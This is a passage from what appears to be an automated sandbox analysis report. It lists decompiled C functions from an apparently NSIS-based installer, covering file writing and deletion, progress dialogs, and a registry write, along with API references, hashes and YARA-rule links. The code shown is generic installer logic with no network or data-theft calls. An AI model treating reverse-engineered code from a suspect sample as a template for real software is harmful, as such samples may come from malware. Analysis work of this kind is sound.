                                                                                                        • Instruction Fuzzy Hash: C221C371904705ABCB209F78DD08B4BBBF8AF40711F048A29F992F26E0C738E904CB55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040267C, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004056C6(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E0040581E(_t52);
				_t27 = E0040583D(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031F1(_t47);
						E004031BF(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F18(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004057FE( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F18(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                                        0x0040267c
                                                                                                        0x0040267e
                                                                                                        0x0040268a
                                                                                                        0x0040268d
                                                                                                        0x00402697
                                                                                                        0x0040269b
                                                                                                        0x0040269b
                                                                                                        0x004026a1
                                                                                                        0x004026ae
                                                                                                        0x004026b6
                                                                                                        0x004026b9
                                                                                                        0x004026bf
                                                                                                        0x004026cd
                                                                                                        0x004026d2
                                                                                                        0x004026d6
                                                                                                        0x004026d9
                                                                                                        0x004026e2
                                                                                                        0x004026ee
                                                                                                        0x004026f2
                                                                                                        0x004026f5
                                                                                                        0x004026ff
                                                                                                        0x0040271e
                                                                                                        0x00402706
                                                                                                        0x0040270b
                                                                                                        0x00402713
                                                                                                        0x00402716
                                                                                                        0x0040271b
                                                                                                        0x0040271b
                                                                                                        0x00402725
                                                                                                        0x00402725
                                                                                                        0x00402737
                                                                                                        0x0040273e
                                                                                                        0x00402750
                                                                                                        0x00402750
                                                                                                        0x00402756
                                                                                                        0x00402756
                                                                                                        0x00402761
                                                                                                        0x00402762
                                                                                                        0x00402766
                                                                                                        0x0040276a
                                                                                                        0x00402770
                                                                                                        0x00402770
                                                                                                        0x00402777
                                                                                                        0x00402164
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                                        • GlobalFree.KERNEL32 ref: 00402725
                                                                                                        • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                                        • GlobalFree.KERNEL32 ref: 0040273E
                                                                                                        • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3294113728-0
                                                                                                        • Opcode ID: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
                                                                                                        • Instruction ID: 719c612f4f238206e278f6e296a81204df483451b361404a9b6a09c3536a307a
                                                                                                        • Opcode Fuzzy Hash: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
                                                                                                        • Instruction Fuzzy Hash: F831AD71C00128BBDF216FA4CD89DAE7E79EF08364F10423AF920772E0C6795D419BA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404F04, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00404F04(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405B88(0, _t39, 0x41fc78, 0x41fc78, _a4);
					}
					_t26 = lstrlenA(0x41fc78);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc78);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc78;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc78)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc78, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                        0x00404f0a
                                                                                                        0x00404f16
                                                                                                        0x00404f19
                                                                                                        0x00404f1f
                                                                                                        0x00404f2b
                                                                                                        0x00404f2e
                                                                                                        0x00404f31
                                                                                                        0x00404f37
                                                                                                        0x00404f37
                                                                                                        0x00404f3d
                                                                                                        0x00404f45
                                                                                                        0x00404f48
                                                                                                        0x00404f65
                                                                                                        0x00404f69
                                                                                                        0x00404f72
                                                                                                        0x00404f72
                                                                                                        0x00404f7c
                                                                                                        0x00404f85
                                                                                                        0x00404f91
                                                                                                        0x00404f98
                                                                                                        0x00404f9c
                                                                                                        0x00404f9f
                                                                                                        0x00404fb2
                                                                                                        0x00404fc0
                                                                                                        0x00404fc0
                                                                                                        0x00404fc4
                                                                                                        0x00404fc6
                                                                                                        0x00404fc9
                                                                                                        0x00000000
                                                                                                        0x00404fc9
                                                                                                        0x00404f4a
                                                                                                        0x00404f52
                                                                                                        0x00404f5a
                                                                                                        0x00404f60
                                                                                                        0x00000000
                                                                                                        0x00404f60
                                                                                                        0x00404f5a
                                                                                                        0x00404f48
                                                                                                        0x00404fd3

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                        • lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                        • lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                        • SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                        • String ID:
                                                                                                        • API String ID: 2531174081-0
                                                                                                        • Opcode ID: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
                                                                                                        • Instruction ID: 33d69ec58002f5e3cec48cf4aa7ac502a1da6879986bf9ca4026f821734cd723
                                                                                                        • Opcode Fuzzy Hash: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
                                                                                                        • Instruction Fuzzy Hash: C4219D71A00108BBDF119FA5CD849DEBFB9EB49354F14807AFA04B6290C3389E45CBA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402BD3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00402BD3(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41704c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41704c = 0;
					return _t15;
				}
				__eflags =  *0x41704c; // 0x0
				if(__eflags != 0) {
					return E00405EC1(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B3B, 0);
						 *0x41704c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BB7());
						return E00404F04(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                                        0x00402bdf
                                                                                                        0x00402be1
                                                                                                        0x00402be8
                                                                                                        0x00402beb
                                                                                                        0x00402beb
                                                                                                        0x00402bf1
                                                                                                        0x00000000
                                                                                                        0x00402bf1
                                                                                                        0x00402bf9
                                                                                                        0x00402bff
                                                                                                        0x00000000
                                                                                                        0x00402c02
                                                                                                        0x00402c09
                                                                                                        0x00402c0f
                                                                                                        0x00402c15
                                                                                                        0x00402c17
                                                                                                        0x00402c1d
                                                                                                        0x00402c5b
                                                                                                        0x00402c64
                                                                                                        0x00000000
                                                                                                        0x00402c69
                                                                                                        0x00402c1f
                                                                                                        0x00402c26
                                                                                                        0x00402c37
                                                                                                        0x00000000
                                                                                                        0x00402c45
                                                                                                        0x00402c26
                                                                                                        0x00402c71

                                                                                                        APIs
                                                                                                        • DestroyWindow.USER32(00000000,00000000), ref: 00402BEB
                                                                                                        • GetTickCount.KERNEL32 ref: 00402C09
                                                                                                        • wsprintfA.USER32 ref: 00402C37
                                                                                                          • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                          • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                          • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C5B
                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C69
                                                                                                          • Part of subcall function 00402BB7: MulDiv.KERNEL32(00008000,00000064,?), ref: 00402BCC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                        • String ID: ... %d%%
                                                                                                        • API String ID: 722711167-2449383134
                                                                                                        • Opcode ID: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                        • Instruction ID: c44cf6bb529b7c61e0c77009ed50883557557090b8ffabf6f859222ef57aaf40
                                                                                                        • Opcode Fuzzy Hash: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                        • Instruction Fuzzy Hash: C6016170949210EBD7215F61EE4DA9F7B78AB04701B14403BF502B11E5C6BC9A01CBAE
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004047D3, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004047D3(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                        0x004047e1
                                                                                                        0x004047ee
                                                                                                        0x004047f4
                                                                                                        0x00404832
                                                                                                        0x00404832
                                                                                                        0x00404841
                                                                                                        0x00404848
                                                                                                        0x00000000
                                                                                                        0x0040484a
                                                                                                        0x004047f6
                                                                                                        0x00404805
                                                                                                        0x0040480d
                                                                                                        0x00404810
                                                                                                        0x00404822
                                                                                                        0x00404828
                                                                                                        0x0040482f
                                                                                                        0x00000000
                                                                                                        0x0040482f
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047EE
                                                                                                        • GetMessagePos.USER32 ref: 004047F6
                                                                                                        • ScreenToClient.USER32 ref: 00404810
                                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404822
                                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404848
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                        • String ID: f
                                                                                                        • API String ID: 41195575-1993550816
                                                                                                        • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                        • Instruction ID: 01d6173a61c3c3b4b037133c9a52f1e04ee3049876a8ff08b59bebc5d15cf036
                                                                                                        • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                        • Instruction Fuzzy Hash: BA018075D40218BADB00DB94CC41BFEBBBCAB55711F10412ABB00B61C0C3B46501CB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402B3B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BB7();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                        0x00402b48
                                                                                                        0x00402b56
                                                                                                        0x00402b5c
                                                                                                        0x00402b5c
                                                                                                        0x00402b6a
                                                                                                        0x00402b6c
                                                                                                        0x00402b78
                                                                                                        0x00402b7d
                                                                                                        0x00402b7f
                                                                                                        0x00402b7f
                                                                                                        0x00402b8a
                                                                                                        0x00402b9a
                                                                                                        0x00402bac
                                                                                                        0x00402bac
                                                                                                        0x00402bb4

                                                                                                        APIs
                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                                        • wsprintfA.USER32 ref: 00402B8A
                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402B9A
                                                                                                        • SetDlgItemTextA.USER32 ref: 00402BAC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                        • API String ID: 1451636040-1158693248
                                                                                                        • Opcode ID: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                        • Instruction ID: 39266fd7d8b3d51d4259f470751267aa52f8e49dbca779dff7f29341b6a717b4
                                                                                                        • Opcode Fuzzy Hash: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                        • Instruction Fuzzy Hash: AFF03671900109ABEF255F51DD0ABEE3779FB00305F008036FA05B51D1D7F9AA559F99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402303, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AEB(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029F6(0x23);
						_t19 = lstrlenA(0x40a370) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029D9(3);
						 *0x40a370 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F18(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a370, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a370, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}










                                                                                                        0x00402304
                                                                                                        0x00402309
                                                                                                        0x00402313
                                                                                                        0x0040231d
                                                                                                        0x00402320
                                                                                                        0x00402330
                                                                                                        0x0040233a
                                                                                                        0x00402341
                                                                                                        0x00402349
                                                                                                        0x00402357
                                                                                                        0x0040235b
                                                                                                        0x00402366
                                                                                                        0x00402366
                                                                                                        0x0040236a
                                                                                                        0x0040236e
                                                                                                        0x00402374
                                                                                                        0x00402379
                                                                                                        0x00402379
                                                                                                        0x0040237d
                                                                                                        0x00402389
                                                                                                        0x00402389
                                                                                                        0x004023a2
                                                                                                        0x004023a4
                                                                                                        0x004023a4
                                                                                                        0x004023a7
                                                                                                        0x0040247d
                                                                                                        0x0040247d
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
                                                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nssF140.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
                                                                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nssF140.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nssF140.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValuelstrlen
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nssF140.tmp
                                                                                                        • API String ID: 1356686001-3585529797
                                                                                                        • Opcode ID: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
                                                                                                        • Instruction ID: d7b132d9018d44432a73f3315d2b91b6aa1600c7a927e9fa70905f900517fa5a
                                                                                                        • Opcode Fuzzy Hash: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
                                                                                                        • Instruction Fuzzy Hash: BA1160B1E00209BFEB10AFA0DE49EAF767CFB54398F10413AF905B61D0D7B85D019669
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 73751837, Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 97%
                                                                                                        			E73751837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x7375405c = _a8;
				_t77 = 0;
				 *0x73754060 = _a16;
				_v12 = 0;
				_v8 = E7375123B();
				_t90 = E737512FE(_t42);
				_t87 = _t85;
				_t81 = E7375123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E7375123B();
					_t77 = E737512FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E73751429(_t85, _t90, _t87,  &_v52);
								E73751266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E73752EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E73752F10(_t59, _t83, _t85);
						} else {
							_t48 = E73752F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
